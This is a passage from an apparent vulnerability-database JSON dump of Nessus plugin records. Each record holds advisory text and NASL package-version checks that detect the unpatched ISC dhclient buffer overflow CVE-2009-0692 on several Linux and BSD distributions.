audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1136\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhclient-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhclient-3.0.1-65.el4_8.1\")) flag++; }\n\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhcp-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhcp-3.0.1-65.el4_8.1\")) flag++; }\n\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhcp-devel-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhcp-devel-3.0.1-65.el4_8.1\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:03", "bulletinFamily": "scanner", "description": "New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, 11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient. Note that dhclient is not the default DHCP client in Slackware's networking scripts, dhcpcd is. However, if you use dhclient on a network where someone could deploy a hostile DHCP server, you should upgrade to the new package.", "modified": "2018-06-27T00:00:00", "id": "SLACKWARE_SSA_2009-195-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39796", "published": "2009-07-15T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : dhcp (SSA:2009-195-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-195-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39796);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"SSA\", value:\"2009-195-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : dhcp (SSA:2009-195-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, and -current to fix a security\nissue with dhclient. Note that dhclient is not the default DHCP client\nin Slackware's networking scripts, dhcpcd is. However, if you use\ndhclient on a network where someone could deploy a hostile DHCP\nserver, you should upgrade to the new package.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.561471\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe04b694\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"dhcp\", pkgver:\"3.1.2p1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:00", "bulletinFamily": "scanner", "description": "USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to fix the vulnerability was not properly applied on Ubuntu 8.10 and higher. Even with the patch improperly applied, the default compiler options reduced the vulnerability to a denial of service.\nAdditionally, in Ubuntu 9.04 and higher, users were also protected by the AppArmor dhclient3 profile. This update fixes the problem.\n\nIt was discovered that the DHCP client as included in dhcp3 did not verify the length of certain option fields when processing a response from an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a malicious dhcp server, a remote attacker could cause a denial of service or execute arbitrary code as the user invoking the program, typically the 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker should only be able to cause a denial of service in the DHCP client. In Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-803-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44326", "published": "2010-01-28T00:00:00", "title": "Ubuntu 8.10 / 9.04 / 9.10 : dhcp3 vulnerability (USN-803-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-803-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44326);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"USN\", value:\"803-2\");\n\n script_name(english:\"Ubuntu 8.10 / 9.04 / 9.10 : dhcp3 vulnerability (USN-803-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to\nfix the vulnerability was not properly applied on Ubuntu 8.10 and\nhigher. Even with the patch improperly applied, the default compiler\noptions reduced the vulnerability to a denial of service.\nAdditionally, in Ubuntu 9.04 and higher, users were also protected by\nthe AppArmor dhclient3 profile. This update fixes the problem.\n\nIt was discovered that the DHCP client as included in dhcp3 did not\nverify the length of certain option fields when processing a response\nfrom an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04\nLTS connected to a malicious dhcp server, a remote attacker could\ncause a denial of service or execute arbitrary code as the user\ninvoking the program, typically the 'dhcp' user. For users running\nUbuntu 8.10 or 9.04, a remote attacker should only be able to cause a\ndenial of service in the DHCP client. In Ubuntu 9.04, attackers would\nalso be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/803-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp-client\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp-client\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-client\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-common\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-server\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client / dhcp3-client / dhcp3-client-udeb / dhcp3-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:27", "bulletinFamily": "scanner", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be caught by the buffer overflow checking in newer distributions. (SLES 10 and 11).", "modified": "2013-10-25T00:00:00", "id": "SUSE_11_DHCP-CLIENT-090626.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41383", "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : dhcp-client (SAT Patch Number 1041)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41383);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:41:53 $\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"SuSE 11 Security Update : dhcp-client (SAT Patch Number 1041)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be\ncaught by the buffer overflow checking in newer distributions. (SLES\n10 and 11).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=515599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0692.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1041.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:03", "bulletinFamily": "scanner", "description": "US-CERT reports :\n\nThe ISC DHCP dhclient application contains a stack-based buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code with root privileges.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_C444C8B7716911DE9AB7000C29A67389.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39802", "published": "2009-07-16T00:00:00", "title": "FreeBSD : isc-dhcp-client -- Stack overflow vulnerability (c444c8b7-7169-11de-9ab7-000c29a67389)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39802);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/10 11:49:42\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_xref(name:\"CERT\", value:\"410676\");\n script_xref(name:\"Secunia\", value:\"35785\");\n\n script_name(english:\"FreeBSD : isc-dhcp-client -- Stack overflow vulnerability (c444c8b7-7169-11de-9ab7-000c29a67389)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"US-CERT reports :\n\nThe ISC DHCP dhclient application contains a stack-based buffer overflow,\nwhich may allow a remote, unauthenticated attacker to execute\narbitrary code with root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.isc.org/node/468\"\n );\n # https://vuxml.freebsd.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb8f1b0c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:isc-dhcp30-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:isc-dhcp31-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"isc-dhcp31-client<=3.1.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"isc-dhcp30-client<3.0.7_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": 